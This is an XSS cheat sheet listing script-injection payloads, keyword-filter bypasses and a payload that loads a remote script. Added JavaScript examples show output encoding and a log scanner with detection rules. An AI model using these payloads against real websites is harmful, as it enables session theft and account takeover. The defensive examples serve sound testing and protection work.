1. Common payloads
<img src=x o<x>nerror=a<x>lert(/xss/)>
"/>
<script>alert(1)</script>
"><script src=www.baidu.com>
<img src=x onerror=prompt(1);>
<img src="x" onclick="alert(1)"> (fires on click)
<img/**/src=1 onerror=confirm(1)>
<img src=# onerror=confirm(1)> (or close with />)
<img src=1 onerror=console.log(alert(1));//
Inside an <input> tag, the following can be tried:
xxxxx" onmouseover="alert(123)"
xxxxx" onFocus="alert(1)"
xxxxx" onClick="alert(1)">
xxxxx");alert(1);// (works when the parameter is reflected between <script></script>; make sure to close the preceding parentheses and quotes)
2. Keyword filtering of <script> and onerror
Rewrite as <scr<script>ipt> and oneonerrorrror: a filter that strips a single occurrence of the keyword leaves the outer text intact, which reassembles into the original keyword.
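The nested-keyword trick above works only against single-pass keyword stripping. The block below is an added example (not part of the original cheat sheet) that reproduces that naive filter, shows the page's own payloads surviving it, and contrasts it with context-aware output encoding, the fix a defender would actually ship. The function names and the filter itself are assumptions for illustration, not any real library's API.

```javascript
// Added example, not from the original cheat sheet. Payloads are the ones
// quoted on the page; function names are illustrative assumptions.

// A blacklist filter of the kind the nested payloads defeat: it deletes each
// forbidden token once and never re-scans its own output.
function naiveStrip(input) {
  return input.replace(/<script>/gi, '').replace(/onerror/gi, '');
}

// Output encoding for HTML text and quoted-attribute contexts. Every
// character that can close a value or open a tag becomes an entity, so the
// browser renders the input as literal text instead of parsing it.
const ENTITY = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
function encodeHtml(str) {
  return String(str).replace(/[&<>"']/g, (ch) => ENTITY[ch]);
}

// Two reflection points from the page: an <input value="..."> attribute and
// an element body. Encoding is applied at the insertion point, per context.
function renderInputValue(userInput) {
  return `<input type="text" value="${encodeHtml(userInput)}">`;
}
function renderTextNode(userInput) {
  return `<div>${encodeHtml(userInput)}</div>`;
}

// True if a string still contains characters that can break out of a quoted
// attribute value or start a tag.
function hasRawDelimiters(s) {
  return /[<>"']/.test(s);
}

// Stand-alone demo with the page's payloads.
const NESTED_TAG = '<scr<script>ipt>alert(1)</script>';
const NESTED_HANDLER = '<img src=x oneonerrorrror=alert(1)>';
const ATTR_BREAKOUT = 'xxxxx" onFocus="alert(1)"';

console.log('naive  :', naiveStrip(NESTED_TAG));        // stripped copy reassembles
console.log('naive  :', naiveStrip(NESTED_HANDLER));
console.log('encoded:', renderInputValue(ATTR_BREAKOUT)); // quote stays inside the value
console.log('encoded:', renderTextNode(NESTED_TAG));
```

Entity encoding covers the HTML text and quoted-attribute contexts on this page. It does not cover the `<script>` string context of the `");alert(1);//` payload (that needs JavaScript string escaping, or better, not reflecting data into script at all) and it does not stop a `javascript:` URL that is later assigned to `location`, which needs scheme validation rather than encoding.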
3. Some reflected XSS occurs inside <title>, where the tag can be closed with </title>
Example: https://www.cnblogs.com/superye/p/7343676.html?utm_source=itdadao&utm_medium=referral
4. When spaces are encoded or filtered, /**/ or <> can be used in place of whitespace
5. <input> with <>, () and '' filtered
Construct a local payload:
xxxxxxxxxx" name=javasCript:alert%281%29 autofocus onfocus=location=this.name xx
Construct a payload that loads a remote script:
xxxxxxxxxx" name=javasCript:s=document.createElement%28"sCript"%29;s.src="//xxxxx.js";document.body.appendChild%28s%29 autofocus onfocus=location=this.name xx
Here %28 and %29 are the URL encoding of ( and ); reference: https://xsspt.com/index.php?do=binfo&id=2016-0195079
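Sections 3 to 5 all rely on the same evasions: URL-encoded parentheses, mixed case (javasCript), and /**/ standing in for spaces. A detector that matches raw request bytes misses all of them. The block below is an added example (not from the original cheat sheet) of a small WAF-style scanner that normalises before matching, run over constructed access-log lines built from this page's payloads. The log format, rule names and function names are assumptions for illustration.

```javascript
// Added example, not from the original cheat sheet. Log lines are constructed
// from the page's payloads; the "<method> <path?query> <status>" format, the
// rule set and the function names are illustrative assumptions.

// Normalise a query string the way a browser will see it: percent-decode
// (twice, to catch double encoding), treat /**/ as whitespace, lower-case.
function normalise(raw) {
  let s = raw;
  for (let i = 0; i < 2; i++) {
    try { s = decodeURIComponent(s); } catch (e) { break; } // malformed %xx: keep as-is
  }
  return s.replace(/\/\*.*?\*\//g, ' ').toLowerCase();
}

// Indicators for the techniques listed on this page. Because the nested forms
// <scr<script>ipt> and oneonerrorrror literally contain the keyword, a
// detector (unlike a stripping filter) does not need special handling for them.
const RULES = [
  { name: 'javascript-uri',     re: /javascript\s*:/ },
  { name: 'event-handler-attr', re: /\bon[a-z]+\s*=/ },
  { name: 'script-tag',         re: /<\s*\/?\s*script\b/ },
  { name: 'title-breakout',     re: /<\s*\/\s*title\s*>/ },
];

// Returns the names of the rules that fire on one log line.
function scanRequest(line) {
  const target = line.split(' ')[1] || '';
  const query = target.includes('?') ? target.slice(target.indexOf('?') + 1) : '';
  const norm = normalise(query);
  return RULES.filter((r) => r.re.test(norm)).map((r) => r.name);
}

// Returns only the lines that triggered at least one rule.
function scanLog(lines) {
  return lines
    .map((line) => ({ line, hits: scanRequest(line) }))
    .filter((entry) => entry.hits.length > 0);
}

// Constructed sample log: one benign search, then the page's payloads as a
// browser would send them (percent-encoded).
const SAMPLE_LOG = [
  'GET /search?q=hello+world 200',
  'GET /profile?name=xxxxxxxxxx%22%20name%3DjavasCript%3Aalert%281%29%20autofocus%20onfocus%3Dlocation%3Dthis.name 200',
  'GET /page?t=%3C%2Ftitle%3E%3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E 200',
  'GET /img?s=%3Cimg/**/src=1/**/onerror=confirm(1)%3E 200',
];

for (const entry of scanLog(SAMPLE_LOG)) {
  console.log(entry.hits.join(','), '<-', entry.line);
}
```

Treat hits as a triage signal rather than a block decision: the event-handler rule also fires on harmless parameters such as `online=1`, and a detector catching the encodings on this page says nothing about the ones it does not know. The durable control remains output encoding at the reflection point.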